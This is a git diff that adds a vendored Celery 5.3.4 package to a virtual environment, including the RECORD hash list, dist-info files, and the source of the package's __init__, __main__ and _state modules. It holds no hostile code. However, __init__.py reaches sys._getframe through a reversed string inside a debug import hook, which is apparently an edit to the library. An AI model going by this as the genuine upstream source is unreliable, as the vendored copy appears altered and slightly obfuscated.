+celery/bin/__pycache__/multi.cpython-310.pyc,, +celery/bin/__pycache__/purge.cpython-310.pyc,, +celery/bin/__pycache__/result.cpython-310.pyc,, +celery/bin/__pycache__/shell.cpython-310.pyc,, +celery/bin/__pycache__/upgrade.cpython-310.pyc,, +celery/bin/__pycache__/worker.cpython-310.pyc,, +celery/bin/amqp.py,sha256=LTO0FZzKs2Z0MBxkccaDG-dQEsmbaLLhKp-0gR4HdQA,10023 +celery/bin/base.py,sha256=mmF-aIFRXOBdjczGFePXORK2YdxLI-cpsnVrDcNSmAw,8525 +celery/bin/beat.py,sha256=qijjERLGEHITaVSGkFgxTxtPYOwl0LUANkC2s2UmNAk,2592 +celery/bin/call.py,sha256=_4co_yn2gM5uGP77FjeVqfa7w6VmrEDGSCLPSXYRp-w,2370 +celery/bin/celery.py,sha256=UW5KmKDphrt7SpyGLnZY16fc6_XI6BdSVdrxb_Vvi3U,7440 +celery/bin/control.py,sha256=nr_kFxalRvKqC2pgJmQVNmRxktnqfStlpRM51I9pXS4,7058 +celery/bin/events.py,sha256=fDemvULNVhgG7WiGC-nRnX3yDy4eXTaq8he7T4mD6Jk,2794 +celery/bin/graph.py,sha256=Ld2dKSxIdWHxFXrjsTXAUBj6jb02AVGyTPXDUZA_gvo,5796 +celery/bin/list.py,sha256=2OKPiXn6sgum_02RH1d_TBoXcpNcNsooT98Ht9pWuaY,1058 +celery/bin/logtool.py,sha256=sqK4LfuAtHuVD7OTsKbKfvB2OkfOD-K37ac9i_F8NIs,4267 +celery/bin/migrate.py,sha256=s-lCLk2bFR2GFDB8-hqa8vUhh_pJLdbmb_ZEnjLBF7Y,2108 +celery/bin/multi.py,sha256=FohM99n_i2Ca3cOh9W8Kho3k48Ml18UbpOVpPErNxDk,15374 +celery/bin/purge.py,sha256=K9DSloPR0w2Z68iMyS48ma2_d1m5v8VdwKv6mQZI_58,2608 +celery/bin/result.py,sha256=8UZHRBUaxJre8u3ox2MzxG_08H9sXGnryxbFWnoBPZs,976 +celery/bin/shell.py,sha256=D4Oiw9lEyF-xHJ3fJ5_XckgALDrsDTYlsycT1p4156E,4839 +celery/bin/upgrade.py,sha256=EBzSm8hb0n6DXMzG5sW5vC4j6WHYbfrN2Fx83s30i1M,3064 +celery/bin/worker.py,sha256=cdYBrO2P3HoNzuPwXIJH4GAMu1KlLTEYF40EkVu0veo,12886 +celery/bootsteps.py,sha256=49bMT6CB0LPOK6-i8dLp7Hpko_WaLJ9yWlCWF3Ai2XI,12277 +celery/canvas.py,sha256=O3S3p0p8K8m4kcy47h4n-hM92Ye9kg870aQEPzJYfXQ,95808 +celery/concurrency/__init__.py,sha256=CivIIzjLWHEJf9Ed0QFSTCOxNaWpunFDTzC2jzw3yE0,1457 +celery/concurrency/__pycache__/__init__.cpython-310.pyc,, +celery/concurrency/__pycache__/asynpool.cpython-310.pyc,, +celery/concurrency/__pycache__/base.cpython-310.pyc,, +celery/concurrency/__pycache__/eventlet.cpython-310.pyc,, +celery/concurrency/__pycache__/gevent.cpython-310.pyc,, +celery/concurrency/__pycache__/prefork.cpython-310.pyc,, +celery/concurrency/__pycache__/solo.cpython-310.pyc,, +celery/concurrency/__pycache__/thread.cpython-310.pyc,, +celery/concurrency/asynpool.py,sha256=3hlvqZ99tHXzqZZglwoBAOHNbHZ8zVBWd9soWYQrro8,51471 +celery/concurrency/base.py,sha256=atOLC90FY7who__TonZbpd2awbOinkgWSx3m15Mg1WI,4706 +celery/concurrency/eventlet.py,sha256=i4Xn3Kqg0cxbMyw7_aCTVCi7EOA5aLEiRdkb1xMTpvM,5126 +celery/concurrency/gevent.py,sha256=oExJqOLAWSlV2JlzNnDL22GPlwEpg7ExPJBZMNP4CC8,3387 +celery/concurrency/prefork.py,sha256=vdnfeiUtnxa2ZcPSBB-pI6Mwqb2jm8dl-fH_XHPEo6M,5850 +celery/concurrency/solo.py,sha256=H9ZaV-RxC30M1YUCjQvLnbDQCTLafwGyC4g4nwqz3uM,754 +celery/concurrency/thread.py,sha256=rMpruen--ePsdPoqz9mDwswu5GY3avji_eG-7AAY53I,1807 +celery/contrib/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery/contrib/__pycache__/__init__.cpython-310.pyc,, +celery/contrib/__pycache__/abortable.cpython-310.pyc,, +celery/contrib/__pycache__/migrate.cpython-310.pyc,, +celery/contrib/__pycache__/pytest.cpython-310.pyc,, +celery/contrib/__pycache__/rdb.cpython-310.pyc,, +celery/contrib/__pycache__/sphinx.cpython-310.pyc,, +celery/contrib/abortable.py,sha256=ffr47ovGoIUO2gMMSrJwWPP6MSyk3_S1XuS02KxRMu4,5003 +celery/contrib/migrate.py,sha256=EvvNWhrykV3lTkZHOghofwemZ-_sixKG97XUyQbS9Dc,14361 +celery/contrib/pytest.py,sha256=ztbqIZ0MuWRLTA-RT6k5BKVvuuk2-HPoFD9-q3uHo-s,6754 +celery/contrib/rdb.py,sha256=BKorafe3KkOj-tt-bEL39R74u2njv-_7rRHfRajr3Ss,5005 +celery/contrib/sphinx.py,sha256=Fkw1dqAqUZ1UaMa7PuHct_Ccg1K0E_OdLq7duNtQkc8,3391 +celery/contrib/testing/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery/contrib/testing/__pycache__/__init__.cpython-310.pyc,, +celery/contrib/testing/__pycache__/app.cpython-310.pyc,, +celery/contrib/testing/__pycache__/manager.cpython-310.pyc,, +celery/contrib/testing/__pycache__/mocks.cpython-310.pyc,, +celery/contrib/testing/__pycache__/tasks.cpython-310.pyc,, +celery/contrib/testing/__pycache__/worker.cpython-310.pyc,, +celery/contrib/testing/app.py,sha256=lvW-YY2H18B60mA5SQetO3CzTI7jKQRsZXGthR27hxE,3112 +celery/contrib/testing/manager.py,sha256=WnvWLdVJQfSap5rVSKO8NV2gBzWsczmi5Fr3Hp-85-4,8605 +celery/contrib/testing/mocks.py,sha256=mcWdsxpTvaWkG-QBGnETLcdevl-bzaq3eSOSsGo2y6w,4182 +celery/contrib/testing/tasks.py,sha256=pJM3aabw7udcppz4QNeUg1-6nlnbklrT-hP5JXmL-gM,208 +celery/contrib/testing/worker.py,sha256=91V-7MfPw7FZC5pBLwvNgJ_ykA5h1QO0DRV1Bu_nI7Q,7051 +celery/events/__init__.py,sha256=9d2cviCw5zIsZ3AvQJkx77HPTlxmVIahRR7Qa54nQnU,477 +celery/events/__pycache__/__init__.cpython-310.pyc,, +celery/events/__pycache__/cursesmon.cpython-310.pyc,, +celery/events/__pycache__/dispatcher.cpython-310.pyc,, +celery/events/__pycache__/dumper.cpython-310.pyc,, +celery/events/__pycache__/event.cpython-310.pyc,, +celery/events/__pycache__/receiver.cpython-310.pyc,, +celery/events/__pycache__/snapshot.cpython-310.pyc,, +celery/events/__pycache__/state.cpython-310.pyc,, +celery/events/cursesmon.py,sha256=GfQQSJwaMKtZawPsvvQ6qGv7f613hMhAJspDa1hz9OM,17961 +celery/events/dispatcher.py,sha256=7b3-3d_6ukvRNajyfiHMX1YvoWNIzaB6zS3-zEUQhG4,8987 +celery/events/dumper.py,sha256=7zOVmAVfG2HXW79Fuvpo_0C2cjztTzgIXnaiUc4NL8c,3116 +celery/events/event.py,sha256=nt1yRUzDrYp9YLbsIJD3eo_AoMhT5sQtZAX-vEkq4Q8,1736 +celery/events/receiver.py,sha256=7dVvezYkBQOtyI-rH77-5QDJztPLB933VF7NgmezSuU,4998 +celery/events/snapshot.py,sha256=OLQuxx1af29LKnYKDoTesnPfK_5dFx3zCZ7JSdg9t7A,3294 +celery/events/state.py,sha256=DdYeAw7hGGFTMc4HRMb0MkizlkJryaysV3t8lXbxhD4,25648 +celery/exceptions.py,sha256=FrlxQiodRtx0RrJfgQo5ZMYTJ8BShrJkteSH29TCUKM,9086 +celery/fixups/__init__.py,sha256=7ctNaKHiOa2fVePcdKPU9J-_bQ0k1jFHaoZlCHXY0vU,14 +celery/fixups/__pycache__/__init__.cpython-310.pyc,, +celery/fixups/__pycache__/django.cpython-310.pyc,, +celery/fixups/django.py,sha256=Px_oC0wTednDePOV-B9ZokMJJbYAsKhgs0zSH5tKRXA,7161 +celery/loaders/__init__.py,sha256=LnRTWk8pz2r7BUj2VUJiBstPjSBwCP0gUDRkbchGW24,490 +celery/loaders/__pycache__/__init__.cpython-310.pyc,, +celery/loaders/__pycache__/app.cpython-310.pyc,, +celery/loaders/__pycache__/base.cpython-310.pyc,, +celery/loaders/__pycache__/default.cpython-310.pyc,, +celery/loaders/app.py,sha256=xqRpRDJkGmTW21N_7zx5F4Na-GCTbNs6Q6tGfInnZnU,199 +celery/loaders/base.py,sha256=l2V-9ObaY-TQHSmmouLizOeqrTGtSq7Wvzl0CrPgVZs,8825 +celery/loaders/default.py,sha256=TZq6zR4tg_20sVJAuSwSBLVRHRyfevHkHhUYrNRYkTU,1520 +celery/local.py,sha256=8iy7CIvQRZMw4958J0SjMHcVwW7AIbkaIpBztdS5wiQ,16087 +celery/platforms.py,sha256=CIpGvQoOTrtJluX3BThBvC0iZdj0vwXgCNiOuWVqar8,25290 +celery/result.py,sha256=r4mdMl2Bts3v-1ukZTKvYd1J1SzC6-7ug12SGi9_Gek,35529 +celery/schedules.py,sha256=g40h0m5_0JfM6Rc0CH7TjyK1MC3Cf6M2rDRmGkS8hxs,32003 +celery/security/__init__.py,sha256=I1px-x5-19O-FcCQm1AHHfVB6Pp-bauwbZ-C1fxGJyc,2363 +celery/security/__pycache__/__init__.cpython-310.pyc,, +celery/security/__pycache__/certificate.cpython-310.pyc,, +celery/security/__pycache__/key.cpython-310.pyc,, +celery/security/__pycache__/serialization.cpython-310.pyc,, +celery/security/__pycache__/utils.cpython-310.pyc,, +celery/security/certificate.py,sha256=Jm-XWVQpzJxB52n4V-zHKO3YsNrlkyFpXiYhzB3QJsk,4008 +celery/security/key.py,sha256=NbocdV_aJjQMZs9DJZrStpTnkFZw_K8SICEMwalsPqI,1189 +celery/security/serialization.py,sha256=yyCQV8YzHwXr0Ht1KJ9-neUSAZJf2tuzKkpndKpvXqs,4248 +celery/security/utils.py,sha256=VJuWxLZFKXQXzlBczuxo94wXWSULnXwbO_5ul_hwse0,845 +celery/signals.py,sha256=z2T4UqrODczbaRFAyoNzO0th4lt_jMWzlxnrBh_MUCI,4384 +celery/states.py,sha256=CYEkbmDJmMHf2RzTFtafPcu8EBG5wAYz8mt4NduYc7U,3324 +celery/utils/__init__.py,sha256=lIJjBxvXCspC-ib-XasdEPlB0xAQc16P0eOPb0gWsL0,935 +celery/utils/__pycache__/__init__.cpython-310.pyc,, +celery/utils/__pycache__/abstract.cpython-310.pyc,, +celery/utils/__pycache__/collections.cpython-310.pyc,, +celery/utils/__pycache__/debug.cpython-310.pyc,, +celery/utils/__pycache__/deprecated.cpython-310.pyc,, +celery/utils/__pycache__/functional.cpython-310.pyc,, +celery/utils/__pycache__/graph.cpython-310.pyc,, +celery/utils/__pycache__/imports.cpython-310.pyc,, +celery/utils/__pycache__/iso8601.cpython-310.pyc,, +celery/utils/__pycache__/log.cpython-310.pyc,, +celery/utils/__pycache__/nodenames.cpython-310.pyc,, +celery/utils/__pycache__/objects.cpython-310.pyc,, +celery/utils/__pycache__/saferepr.cpython-310.pyc,, +celery/utils/__pycache__/serialization.cpython-310.pyc,, +celery/utils/__pycache__/sysinfo.cpython-310.pyc,, +celery/utils/__pycache__/term.cpython-310.pyc,, +celery/utils/__pycache__/text.cpython-310.pyc,, +celery/utils/__pycache__/threads.cpython-310.pyc,, +celery/utils/__pycache__/time.cpython-310.pyc,, +celery/utils/__pycache__/timer2.cpython-310.pyc,, +celery/utils/abstract.py,sha256=xN2Qr-TEp12P8AYO6WigxFr5p8kJPUUb0f5UX3FtHjI,2874 +celery/utils/collections.py,sha256=IQH-QPk2en-C04TA_3zH-6bCPdC93eTscGGx-UT_bEw,25454 +celery/utils/debug.py,sha256=9g5U0NlTvlP9OFwjxfyXgihfzD-Kk_fcy7QDjhkqapw,4709 +celery/utils/deprecated.py,sha256=4asPe222TWJh8mcL53Ob6Y7XROPgqv23nCR-EUHJoBo,3620 +celery/utils/dispatch/__init__.py,sha256=s0_ZpvFWXw1cecEue1vj-MpOPQUPE41g5s-YsjnX6mo,74 +celery/utils/dispatch/__pycache__/__init__.cpython-310.pyc,, +celery/utils/dispatch/__pycache__/signal.cpython-310.pyc,, +celery/utils/dispatch/signal.py,sha256=LcmfBabnRAOR-wiADWQfBT-gN3Lzi29JpAcCvMLNNX4,13603 +celery/utils/functional.py,sha256=TimJEByjq8NtocfSwfEUHoic6G5kCYim3Cl_V84Nnyk,12017 +celery/utils/graph.py,sha256=oP25YXsQfND-VwF-MGolOGX0GbReIzVc9SJfIP1rUIc,9041 +celery/utils/imports.py,sha256=SlTvyvy_91RU-XMgDogLEZiPQytdblura6TLfI34CkA,5032 +celery/utils/iso8601.py,sha256=BIjBHQDYhRWgUPO2PJuQIZr6v1M7bOek8Q7VMbYcQvE,2871 +celery/utils/log.py,sha256=vCbO8Jk0oPdiXCSHTM4plJ83xdfF1qJgg-JUyqbUXXE,8757 +celery/utils/nodenames.py,sha256=URBwdtWR_CF8Ldf6tjxE4y7rl0KxFFD36HjjZcrwQ5Y,2858 +celery/utils/objects.py,sha256=NZ_Nx0ehrJut91sruAI2kVGyjhaDQR_ntTmF9Om_SI8,4215 +celery/utils/saferepr.py,sha256=3S99diwXefbcJS5UwRHzn7ZoPuiY9LlZg9ph_Sb872Y,8945 +celery/utils/serialization.py,sha256=5e1Blvm8GtkNn3LoDObRN9THJRRVVgmp4OFt0eh1AJM,8209 +celery/utils/static/__init__.py,sha256=KwDq8hA-Xd721HldwJJ34ExwrIEyngEoSIzeAnqc5CA,299 +celery/utils/static/__pycache__/__init__.cpython-310.pyc,, +celery/utils/static/celery_128.png,sha256=8NmZxCALQPp3KVOsOPfJVaNLvwwLYqiS5ViOc6x0SGU,2556 +celery/utils/sysinfo.py,sha256=LYdGzxbF357PrYNw31_9f8CEvrldtb0VAWIFclBtCnA,1085 +celery/utils/term.py,sha256=xUQR7vXr_f1-X-TG5o4eAnPGmrh5RM6ffXsdKEaMo6Y,4534 +celery/utils/text.py,sha256=e9d5mDgGmyG6xc7PKfmFVnGoGj9DAocJ13uTSZ4Xyqw,5844 +celery/utils/threads.py,sha256=_SVLpXSiQQNd2INSaMNC2rGFZHjNDs-lV-NnlWLLz1k,9552 +celery/utils/time.py,sha256=vE2m8q54MQ39-1MPUK5sNyWy0AyN4pyNOR6jhMleXEE,14987 +celery/utils/timer2.py,sha256=xv_7x_bDtILx4regqEm1ppQNenozSwOXi-21qQ4EJG4,4813 +celery/worker/__init__.py,sha256=EKUgWOMq_1DfWb-OaAWv4rNLd7gi91aidefMjHMoxzI,95 +celery/worker/__pycache__/__init__.cpython-310.pyc,, +celery/worker/__pycache__/autoscale.cpython-310.pyc,, +celery/worker/__pycache__/components.cpython-310.pyc,, +celery/worker/__pycache__/control.cpython-310.pyc,, +celery/worker/__pycache__/heartbeat.cpython-310.pyc,, +celery/worker/__pycache__/loops.cpython-310.pyc,, +celery/worker/__pycache__/pidbox.cpython-310.pyc,, +celery/worker/__pycache__/request.cpython-310.pyc,, +celery/worker/__pycache__/state.cpython-310.pyc,, +celery/worker/__pycache__/strategy.cpython-310.pyc,, +celery/worker/__pycache__/worker.cpython-310.pyc,, +celery/worker/autoscale.py,sha256=kzb1GTwRyw9DZFjwIvHrcLdJxuIGI8HaHdtvtr31i9A,4593 +celery/worker/components.py,sha256=J5O6vTT82dDUu-2AHV9RfIu4ZCERoVuJYBBXEI7_K3s,7497 +celery/worker/consumer/__init__.py,sha256=yKaGZtBzYKADZMzbSq14_AUYpT4QAY9nRRCf73DDhqc,391 +celery/worker/consumer/__pycache__/__init__.cpython-310.pyc,, +celery/worker/consumer/__pycache__/agent.cpython-310.pyc,, +celery/worker/consumer/__pycache__/connection.cpython-310.pyc,, +celery/worker/consumer/__pycache__/consumer.cpython-310.pyc,, +celery/worker/consumer/__pycache__/control.cpython-310.pyc,, +celery/worker/consumer/__pycache__/events.cpython-310.pyc,, +celery/worker/consumer/__pycache__/gossip.cpython-310.pyc,, +celery/worker/consumer/__pycache__/heart.cpython-310.pyc,, +celery/worker/consumer/__pycache__/mingle.cpython-310.pyc,, +celery/worker/consumer/__pycache__/tasks.cpython-310.pyc,, +celery/worker/consumer/agent.py,sha256=bThS8ZVeuybAyqNe8jmdN6RgaJhDq0llewosGrO85-c,525 +celery/worker/consumer/connection.py,sha256=a7g23wmzevkEiMjjjD8Kt4scihf_NgkpR4gcuksys9M,1026 +celery/worker/consumer/consumer.py,sha256=j88iy-6bT5aZNv2NZDjUoHegPHP3cKT4HXZLxI82H4c,28866 +celery/worker/consumer/control.py,sha256=0NiJ9P-AHdv134mXkgRgU9hfhdJ_P7HKb7z9A4Xqa2Q,946 +celery/worker/consumer/events.py,sha256=FgDwbV0Jbj9aWPbV3KAUtsXZq4JvZEfrWfnrYgvkMgo,2054 +celery/worker/consumer/gossip.py,sha256=g-WJL2rr_q9aM_SaTUrQlPj2ONf8vHs2LvmyRQtDMEU,6833 +celery/worker/consumer/heart.py,sha256=IenkkliKk6sAk2a1NfYyh-doNDlmFWGRiaJd5e8ALpI,930 +celery/worker/consumer/mingle.py,sha256=UG8K6sXF1KUJXNiJ4eMHUMIg4_7K1tDWqYRNfd9Nz9k,2519 +celery/worker/consumer/tasks.py,sha256=PwNqAZHJGQakiymFa4q6wbpmDCp3UtSN_7fd5jgATRk,1960 +celery/worker/control.py,sha256=30azpxShUHNuKevEsJG47zQ11ldrEaaq5yatUvQT23U,19884 +celery/worker/heartbeat.py,sha256=sTV_d0RB9M6zsXIvLZ7VU6teUfX3IK1ITynDpxMS298,2107 +celery/worker/loops.py,sha256=W9ayCwYXOA0aCxPPotXc49uA_n7CnMsDRPJVUNb8bZM,4433 +celery/worker/pidbox.py,sha256=LcQsKDkd8Z93nQxk0SOLulB8GLEfIjPkN-J0pGk7dfM,3630 +celery/worker/request.py,sha256=MF7RsVmm4JrybOhnQZguxDcIpEuefdOTMxADDoJvg70,27229 +celery/worker/state.py,sha256=_nQgvGeoahKz_TJCx7Tr20kKrNtDgaBA78eA17hA-8s,8583 +celery/worker/strategy.py,sha256=MSznfZXkqD6WZRSaanIRZvg-f41DSAc2WgTVUIljh0c,7324 +celery/worker/worker.py,sha256=rNopjWdAzb9Ksszjw9WozvCA5nkDQnbp0n11MeLAitc,14460 diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/REQUESTED b/env/Lib/site-packages/celery-5.3.4.dist-info/REQUESTED new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/WHEEL b/env/Lib/site-packages/celery-5.3.4.dist-info/WHEEL new file mode 100644 index 00000000..1f37c02f --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.40.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/entry_points.txt b/env/Lib/site-packages/celery-5.3.4.dist-info/entry_points.txt new file mode 100644 index 00000000..a5801496 --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/entry_points.txt @@ -0,0 +1,2 @@ +[console_scripts] +celery = celery.__main__:main diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/top_level.txt b/env/Lib/site-packages/celery-5.3.4.dist-info/top_level.txt new file mode 100644 index 00000000..74f9e8fe --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/top_level.txt @@ -0,0 +1 @@ +celery diff --git a/env/Lib/site-packages/celery/__init__.py b/env/Lib/site-packages/celery/__init__.py new file mode 100644 index 00000000..e11a18c7 --- /dev/null +++ b/env/Lib/site-packages/celery/__init__.py @@ -0,0 +1,172 @@ +"""Distributed Task Queue.""" +# :copyright: (c) 2017-2026 Asif Saif Uddin, celery core and individual +# contributors, All rights reserved. +# :copyright: (c) 2015-2016 Ask Solem. All rights reserved. +# :copyright: (c) 2012-2014 GoPivotal, Inc., All rights reserved. +# :copyright: (c) 2009 - 2012 Ask Solem and individual contributors, +# All rights reserved. +# :license: BSD (3 Clause), see LICENSE for more details. + +import os +import re +import sys +from collections import namedtuple + +# Lazy loading +from . import local + +SERIES = 'emerald-rush' + +__version__ = '5.3.4' +__author__ = 'Ask Solem' +__contact__ = 'auvipy@gmail.com' +__homepage__ = 'https://docs.celeryq.dev/' +__docformat__ = 'restructuredtext' +__keywords__ = 'task job queue distributed messaging actor' + +# -eof meta- + +__all__ = ( + 'Celery', 'bugreport', 'shared_task', 'Task', + 'current_app', 'current_task', 'maybe_signature', + 'chain', 'chord', 'chunks', 'group', 'signature', + 'xmap', 'xstarmap', 'uuid', +) + +VERSION_BANNER = f'{__version__} ({SERIES})' + +version_info_t = namedtuple('version_info_t', ( + 'major', 'minor', 'micro', 'releaselevel', 'serial', +)) + +# bumpversion can only search for {current_version} +# so we have to parse the version here. +_temp = re.match( + r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups() +VERSION = version_info = version_info_t( + int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '') +del _temp +del re + +if os.environ.get('C_IMPDEBUG'): # pragma: no cover + import builtins + + def debug_import(name, locals=None, globals=None, + fromlist=None, level=-1, real_import=builtins.__import__): + glob = globals or getattr(sys, 'emarfteg_'[::-1])(1).f_globals + importer_name = glob and glob.get('__name__') or 'unknown' + print(f'-- {importer_name} imports {name}') + return real_import(name, locals, globals, fromlist, level) + builtins.__import__ = debug_import + +# This is never executed, but tricks static analyzers (PyDev, PyCharm, +# pylint, etc.) into knowing the types of these symbols, and what +# they contain. +STATICA_HACK = True +globals()['kcah_acitats'[::-1].upper()] = False +if STATICA_HACK: # pragma: no cover + from celery._state import current_app, current_task + from celery.app import shared_task + from celery.app.base import Celery + from celery.app.task import Task + from celery.app.utils import bugreport + from celery.canvas import (chain, chord, chunks, group, maybe_signature, signature, subtask, xmap, # noqa + xstarmap) + from celery.utils import uuid + +# Eventlet/gevent patching must happen before importing +# anything else, so these tools must be at top-level. + + +def _find_option_with_arg(argv, short_opts=None, long_opts=None): + """Search argv for options specifying short and longopt alternatives. + + Returns: + str: value for option found + Raises: + KeyError: if option not found. + """ + for i, arg in enumerate(argv): + if arg.startswith('-'): + if long_opts and arg.startswith('--'): + name, sep, val = arg.partition('=') + if name in long_opts: + return val if sep else argv[i + 1] + if short_opts and arg in short_opts: + return argv[i + 1] + raise KeyError('|'.join(short_opts or [] + long_opts or [])) + + +def _patch_eventlet(): + import eventlet.debug + + eventlet.monkey_patch() + blockdetect = float(os.environ.get('EVENTLET_NOBLOCK', 0)) + if blockdetect: + eventlet.debug.hub_blocking_detection(blockdetect, blockdetect) + + +def _patch_gevent(): + import gevent.monkey + import gevent.signal + + gevent.monkey.patch_all() + + +def maybe_patch_concurrency(argv=None, short_opts=None, + long_opts=None, patches=None): + """Apply eventlet/gevent monkeypatches. + + With short and long opt alternatives that specify the command line + option to set the pool, this makes sure that anything that needs + to be patched is completed as early as possible. + (e.g., eventlet/gevent monkey patches). + """ + argv = argv if argv else sys.argv + short_opts = short_opts if short_opts else ['-P'] + long_opts = long_opts if long_opts else ['--pool'] + patches = patches if patches else {'eventlet': _patch_eventlet, + 'gevent': _patch_gevent} + try: + pool = _find_option_with_arg(argv, short_opts, long_opts) + except KeyError: + pass + else: + try: + patcher = patches[pool] + except KeyError: + pass + else: + patcher() + + # set up eventlet/gevent environments ASAP + from celery import concurrency + if pool in concurrency.get_available_pool_names(): + concurrency.get_implementation(pool) + + +# this just creates a new module, that imports stuff on first attribute +# access. This makes the library faster to use. +old_module, new_module = local.recreate_module( # pragma: no cover + __name__, + by_module={ + 'celery.app': ['Celery', 'bugreport', 'shared_task'], + 'celery.app.task': ['Task'], + 'celery._state': ['current_app', 'current_task'], + 'celery.canvas': [ + 'Signature', 'chain', 'chord', 'chunks', 'group', + 'signature', 'maybe_signature', 'subtask', + 'xmap', 'xstarmap', + ], + 'celery.utils': ['uuid'], + }, + __package__='celery', __file__=__file__, + __path__=__path__, __doc__=__doc__, __version__=__version__, + __author__=__author__, __contact__=__contact__, + __homepage__=__homepage__, __docformat__=__docformat__, local=local, + VERSION=VERSION, SERIES=SERIES, VERSION_BANNER=VERSION_BANNER, + version_info_t=version_info_t, + version_info=version_info, + maybe_patch_concurrency=maybe_patch_concurrency, + _find_option_with_arg=_find_option_with_arg, +) diff --git a/env/Lib/site-packages/celery/__main__.py b/env/Lib/site-packages/celery/__main__.py new file mode 100644 index 00000000..8c48d707 --- /dev/null +++ b/env/Lib/site-packages/celery/__main__.py @@ -0,0 +1,19 @@ +"""Entry-point for the :program:`celery` umbrella command.""" + +import sys + +from . import maybe_patch_concurrency + +__all__ = ('main',) + + +def main() -> None: + """Entrypoint to the ``celery`` umbrella command.""" + if 'multi' not in sys.argv: + maybe_patch_concurrency() + from celery.bin.celery import main as _main + sys.exit(_main()) + + +if __name__ == '__main__': # pragma: no cover + main() diff --git a/env/Lib/site-packages/celery/_state.py b/env/Lib/site-packages/celery/_state.py new file mode 100644 index 00000000..5d3ed5fc --- /dev/null +++ b/env/Lib/site-packages/celery/_state.py @@ -0,0 +1,197 @@ +"""Internal state. + +This is an internal module containing thread state +like the ``current_app``, and ``current_task``. + +This module shouldn't be used directly. +""" + +import os +import sys +import threading +import weakref + +from celery.local import Proxy +from celery.utils.threads import LocalStack + +__all__ = ( + 'set_default_app', 'get_current_app', 'get_current_task', + 'get_current_worker_task', 'current_app', 'current_task', + 'connect_on_app_finalize', +) + +#: Global default app used when no current app. +default_app = None + +#: Function returning the app provided or the default app if none. +#: +#: The environment variable :envvar:`CELERY_TRACE_APP` is used to +#: trace app leaks. When enabled an exception is raised if there +#: is no active app. +app_or_default = None + +#: List of all app instances (weakrefs), mustn't be used directly. +_apps = weakref.WeakSet() + +#: Global set of functions to call whenever a new app is finalized. +#: Shared tasks, and built-in tasks are created by adding callbacks here. +_on_app_finalizers = set() + +_task_join_will_block = False + + +def connect_on_app_finalize(callback): + """Connect callback to be called when any app is finalized.""" + _on_app_finalizers.add(callback) + return callback + + +def _announce_app_finalized(app): + callbacks = set(_on_app_finalizers) + for callback in callbacks: + callback(app) + + +def _set_task_join_will_block(blocks): + global _task_join_will_block + _task_join_will_block = blocks + + +def task_join_will_block(): + return _task_join_will_block + + +class _TLS(threading.local): + #: Apps with the :attr:`~celery.app.base.BaseApp.set_as_current` attribute + #: sets this, so it will always contain the last instantiated app, + #: and is the default app returned by :func:`app_or_default`. + current_app = None + + +_tls = _TLS() + +_task_stack = LocalStack() + + +#: Function used to push a task to the thread local stack +#: keeping track of the currently executing task. +#: You must remember to pop the task after. +push_current_task = _task_stack.push + +#: Function used to pop a task from the thread local stack +#: keeping track of the currently executing task. +pop_current_task = _task_stack.pop + + +def set_default_app(app): + """Set default app.""" + global default_app + default_app = app + + +def _get_current_app(): + if default_app is None: + #: creates the global fallback app instance. + from celery.app.base import Celery + set_default_app(Celery( + 'default', fixups=[], set_as_current=False, + loader=os.environ.get('CELERY_LOADER') or 'default', + )) + return _tls.current_app or default_app + + +def _set_current_app(app): + _tls.current_app = app + + +if os.environ.get('C_STRICT_APP'): # pragma: no cover + def get_current_app(): + """Return the current app.""" + raise RuntimeError('USES CURRENT APP') +elif os.environ.get('C_WARN_APP'): # pragma: no cover + def get_current_app(): + import traceback + print('-- USES CURRENT_APP', file=sys.stderr) # + + traceback.print_stack(file=sys.stderr) + return _get_current_app() +else: + get_current_app = _get_current_app + + +def get_current_task(): + """Currently executing task.""" + return _task_stack.top + + +def get_current_worker_task(): + """Currently executing task, that was applied by the worker. + + This is used to differentiate between the actual task + executed by the worker and any task that was called within + a task (using ``task.__call__`` or ``task.apply``) + """ + for task in reversed(_task_stack.stack): + if not task.request.called_directly: + return task + + +#: Proxy to current app. +current_app = Proxy(get_current_app) + +#: Proxy to current task. +current_task = Proxy(get_current_task) + + +def _register_app(app): + _apps.add(app) + + +def _deregister_app(app): + _apps.discard(app) + + +def _get_active_apps(): + return _apps + + +def _app_or_default(app=None): + if app is None: + return get_current_app() + return app + + +def _app_or_default_trace(app=None): # pragma: no cover + from traceback import print_stack + try: + from billiard.process import current_process + except ImportError: + current_process = None + if app is None: + if getattr(_tls, 'current_app', None): + print('-- RETURNING TO CURRENT APP --') # + + print_stack() + return _tls.current_app + if not current_process or current_process()._name == 'MainProcess': + raise Exception('DEFAULT APP') + print('-- RETURNING TO DEFAULT APP --') # + + print_stack() + return default_app + return app + + +def enable_trace(): + """Enable tracing of app instances.""" + global app_or_default + app_or_default = _app_or_default_trace + + +def disable_trace(): + """Disable tracing of app instances.""" + global app_or_default + app_or_default = _app_or_default + + +if os.environ.get('CELERY_TRACE_APP'): # pragma: no cover + enable_trace() +else: + disable_trace() diff --git a/env/Lib/site-packages/celery/app/__init__.py b/env/Lib/site-packages/celery/app/__init__.py new file mode 100644 index 00000000..4a946d93 --- /dev/null +++ b/env/Lib/site-packages/celery/app/__init__.py @@ -0,0 +1,76 @@ +"""Celery Application.""" +from celery import _state +from celery._state import app_or_default, disable_trace, enable_trace, pop_current_task, push_current_task +from celery.local import Proxy + +from .base import Celery +from .utils import AppPickler + +__all__ = ( + 'Celery', 'AppPickler', 'app_or_default', 'default_app', + 'bugreport', 'enable_trace', 'disable_trace', 'shared_task', + 'push_current_task', 'pop_current_task', +) + +#: Proxy always returning the app set as default. +default_app = Proxy(lambda: _state.default_app) + + +def bugreport(app=None): + """Return information useful in bug reports.""" + return (app or 